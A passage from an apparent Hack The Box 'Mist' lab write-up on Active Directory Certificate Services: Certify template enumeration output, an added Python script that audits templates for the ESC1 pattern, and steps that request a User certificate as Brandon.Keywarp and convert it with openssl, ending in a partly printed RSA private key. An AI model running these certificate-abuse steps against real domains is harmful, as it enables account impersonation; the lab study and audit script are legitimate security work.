    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : EFSRecovery
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : File Recovery
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Computers         S-1-5-21-1045809509-3006658589-2426055941-515
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : WebServer
    Schema Version                        : 1
    Validity Period                       : 2 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : SubCA
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : <null>
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : DomainControllerAuthentication
    Schema Version                        : 2
    Validity Period                       : 75 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication, Smart Card Logon
    mspki-certificate-application-policy  : Client Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Controllers       S-1-5-21-1045809509-3006658589-2426055941-516
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
                                      MIST\Enterprise Read-only Domain ControllersS-1-5-21-1045809509-3006658589-2426055941-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : DirectoryEmailReplication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Directory Service Email Replication
    mspki-certificate-application-policy  : Directory Service Email Replication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Controllers       S-1-5-21-1045809509-3006658589-2426055941-516
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
                                      MIST\Enterprise Read-only Domain ControllersS-1-5-21-1045809509-3006658589-2426055941-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : KerberosAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
    mspki-certificate-application-policy  : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Controllers       S-1-5-21-1045809509-3006658589-2426055941-516
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
                                      MIST\Enterprise Read-only Domain ControllersS-1-5-21-1045809509-3006658589-2426055941-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteOwner Principals       : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 99 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Users             S-1-5-21-1045809509-3006658589-2426055941-513
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
        WriteOwner Principals       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : ComputerAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : Client Authentication, Server Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Computers         S-1-5-21-1045809509-3006658589-2426055941-515
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
        WriteOwner Principals       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : ManagerAuthentication
    Schema Version                        : 2
    Validity Period                       : 99 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_COMMON_NAME
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email, Server Authentication
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email, Server Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Certificate Services     S-1-5-21-1045809509-3006658589-2426055941-1132
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
        WriteOwner Principals       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : BackupSvcAuthentication
    Schema Version                        : 2
    Validity Period                       : 99 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_COMMON_NAME
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\CA Backup                S-1-5-21-1045809509-3006658589-2426055941-1134
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
        WriteOwner Principals       : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteDacl Principals        : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
        WriteProperty Principals    : MIST\Administrator            S-1-5-21-1045809509-3006658589-2426055941-500
                                      MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

Here we only need to pay attention to the CA information; any template will do, so we pick the first one, the User template.

[*] Listing info about the Enterprise CA 'mist-DC01-CA'

    Enterprise CA Name            : mist-DC01-CA
    DNS Hostname                  : DC01.mist.htb
    FullName                      : DC01.mist.htb\mist-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=mist-DC01-CA, DC=mist, DC=htb
    Cert Thumbprint               : A515DF0E980933BEC55F89DF02815E07E3A7FE5E
    Cert Serial                   : 3BF0F0DDF3306D8E463B218B7DB190F0
    Cert Start Date               : 2/15/2024 7:07:23 AM
    Cert End Date                 : 2/15/2123 7:17:23 AM
    Cert Chain                    : CN=mist-DC01-CA,DC=mist,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
      Allow  ManageCA, ManageCertificates               MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
    Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
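
The template listing above is what an auditor reads to decide whether any template is enrollable by low-privilege principals with a caller-supplied subject and an authentication EKU (the pattern Certify reports as ESC1). The script below is an added example, not code from the writeup, Certify or the box: it parses Certify's indented "CA Name / Template Name / ... / Permissions" blocks and flags that pattern. The sample text is constructed; its first two blocks copy the SubCA and UserAuthentication entries shown above, while the third template, "ContractorAuth", is hypothetical and exists only to exercise the check (on this box Certify found no such template, which the SubCA block illustrates: ENROLLEE_SUPPLIES_SUBJECT is set, but only Domain Admins and Enterprise Admins can enroll).

```python
"""Audit AD CS templates from Certify's text listing (constructed example).

Flags templates where a low-privilege principal can enroll for a certificate
usable for client authentication while supplying the subject (ESC1 pattern),
with no manager approval and no extra signatures required.
"""
import re

# "principal            S-1-5-..."; the SID may be glued to a long principal name
PRINCIPAL_RE = re.compile(r"^(.*?)\s*(S-1-[0-9-]+)\s*$")
# "Key   : value" lines; keys contain letters, digits, spaces, '-' and '_'
KV_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 _-]*?)\s*:\s*(.*)$")

LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # Everyone, Authenticated Users, BUILTIN\Users
LOW_PRIV_RIDS = {"513", "515"}                            # Domain Users, Domain Computers
AUTH_EKUS = ("Client Authentication", "Smart Card Logon",
             "PKINIT Client Authentication", "Any Purpose")


def parse_templates(text):
    """One dict per 'CA Name' block; 'rights' maps permission kind -> [(principal, sid)]."""
    templates, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        kv = KV_RE.match(line)
        if kv:
            key, val = kv.group(1).strip(), kv.group(2).strip()
            if key == "CA Name":                      # a new template block starts here
                cur = {"CA Name": val, "rights": {}}
                templates.append(cur)
                section = None
                continue
            if cur is None:
                continue
            pm = PRINCIPAL_RE.match(val)
            if pm and (key == "Owner" or key.endswith(("Rights", "Principals"))):
                section = key                         # bare lines that follow extend this list
                cur["rights"].setdefault(key, []).append((pm.group(1).strip(), pm.group(2)))
            else:
                section = None
                cur[key] = val
            continue
        pm = PRINCIPAL_RE.match(line)                 # continuation line: principal + SID only
        if pm and cur is not None and section:
            cur["rights"][section].append((pm.group(1).strip(), pm.group(2)))
        else:
            section = None                            # "Permissions" style headers end a list
    return templates


def is_low_priv(sid):
    if sid in LOW_PRIV_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in LOW_PRIV_RIDS


def has_auth_eku(template):
    eku = template.get("pkiextendedkeyusage", "")
    # <null> EKU means the certificate is valid for any purpose, authentication included
    return eku == "<null>" or any(e in eku for e in AUTH_EKUS)


def esc1_findings(templates):
    """[(template name, [low-privilege enrollers])] for templates matching the ESC1 pattern."""
    findings = []
    for t in templates:
        low = [p for p, s in t["rights"].get("Enrollment Rights", []) if is_low_priv(s)]
        if ("ENROLLEE_SUPPLIES_SUBJECT" in t.get("msPKI-Certificate-Name-Flag", "")
                and has_auth_eku(t)
                and t.get("Authorized Signatures Required", "0") == "0"
                and "PEND_ALL_REQUESTS" not in t.get("mspki-enrollment-flag", "")
                and low):
            findings.append((t["Template Name"], low))
    return findings


# Constructed sample in Certify's listing format; "ContractorAuth" is hypothetical
SAMPLE = r"""
    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : SubCA
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519
      Object Control Permissions
        Owner                       : MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : UserAuthentication
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      MIST\Domain Users             S-1-5-21-1045809509-3006658589-2426055941-513
                                      MIST\Enterprise Admins        S-1-5-21-1045809509-3006658589-2426055941-519

    CA Name                               : DC01.mist.htb\mist-DC01-CA
    Template Name                         : ContractorAuth
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MIST\Domain Admins            S-1-5-21-1045809509-3006658589-2426055941-512
                                      NT AUTHORITY\Authenticated UsersS-1-5-11
"""

if __name__ == "__main__":
    for name, who in esc1_findings(parse_templates(SAMPLE)):
        print(f"[!] {name}: ESC1 pattern, enrollable by {', '.join(who)}")
```

Feeding the full `Certify.exe find` output to `parse_templates` works the same way; the CA block at the top has no "Enrollment Rights" line with a SID that ends a template, so it is simply parsed as one more dict and never flagged.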

Request a certificate with the User template

Certify.exe request /ca:DC01\mist-DC01-CA /template:User

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ __| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.1.0                               

[*] Action: Request a Certificates

[*] Current user context    : MIST\Brandon.Keywarp
[*] No subject name specified, using current context as subject.

[*] Template                : User
[*] Subject                 : CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb

[*] Certificate Authority   : DC01\mist-DC01-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 62

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

# Here it tells us how to convert the certificate
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:03.5638229

Follow the hint at the end of its output to convert the certificate.
Copy the CERTIFICATE (and the private key) into a .pem file, then convert the certificate format

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# file Brandon.Keywrap.pem 
Brandon.Keywrap.pem: PEM certificate
                                                                 
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat Brandon.Keywrap.pem 
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
┌──(root㉿kali)-[~/Desktop/htb/mist]        
└─# openssl pkcs12 -in Brandon.Keywrap.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out Brandon.Keywrap.pfx
Enter Export Password:       # an empty password is fine
Verifying - Enter Export Password: 

┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# cat Brandon.Keywrap.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5C5RVcTJ4w4ISkdZ3nAYx4S14xnn25wmRahhk7ksdWApgP9n
e9GJ3UbkCIA629dxOSRaXB30gljtU2dnMGCxfokgU+Y3GkntdwaNIaQZOgznLotV
XnL9szbOwcu4K7NX97ox/vJOhhHGnrYpbEzX991qWi48WIy72teQ/g+hEHchDyUz
J3fD5qc4QeYaC1PBtYNJ5v+loWtKpReUIP38DMWqbffyfhplnGxCWS7expaPnTcc
+L3mDm6BPziJaambg+rCeJM8U8uQjbgRyT77PZcxUsPudcBEZv8izYxZvurvibp5
H2s1QVboyyfg0Sn+IJOWcH+Fo8L6tqa5K96N3QIDAQABAoIBAHlDuEv5mkVFttgq
1TLmpfSarcM0iEjo0logo0LLnTn/0e7RTSC7eiYTv6pY427kLzLsA+2Cqef/9Jhn
kqpeKNYTcA/GgDBDa6Te4XAocpOsOcw9li/ssrFkhjrt1kG7PRvVYy6XfW240rKU
Iq2ApSIAFL46Zi21FTy3ZUHv8mv5sqJ42Q5Z7tWvx9j2amv4L2DYdwzM56LY3BPg
n6MnGXF3YMoRqH7bjuuV3zI9D+051IXVCpIo87AbeScxc03gOrW/ARW6DtCRvvTu
/JTN0wSf13qLpOc+f4akm6olqN0Lor5CBKq/3ZDmVxpfjoi4VrQaeIx8s34hOGLi
kg7Gd60CgYEA+N7QiOTLDV13e18WP86yCuc5deW9XVBo5Wg6RxJSdbFM3eGGUOH9
Km0SPmk7q14QYz0Nu6WzqYp0ASiiFS9bTz3htoDSXOZvAoDYEG3o8Y6k1OYTvxdC
I1rLJqia5Xia+TiBDTpQNQ+N+Q8aVtqpmBDwJvmzyCUkFY5Bm6zE0NsCgYEA6rfE
7ZgZRilZn2f+3IygdGOjYFj9vvy4k/cCqIR3WUggoavvqTTFIEKYkTFMd72vbo1L
iJhRsFMmZNBpM9oytzgYGAYqhUAYTA4jwXDmCW4gWbeDJ4jdFoVqB1coR3wXDvpc
hsxiAjmP5h9krvvaesVMGHepTgAvSTU4rSVsnacCgYEAh3zObOiaPwF2jdzbgQtn
VJZDaxMS/91J7jLLH2wzJk3LOjSQajJOIK3Ws9GYoZgJNe3ELzdr005ED2lurDfm
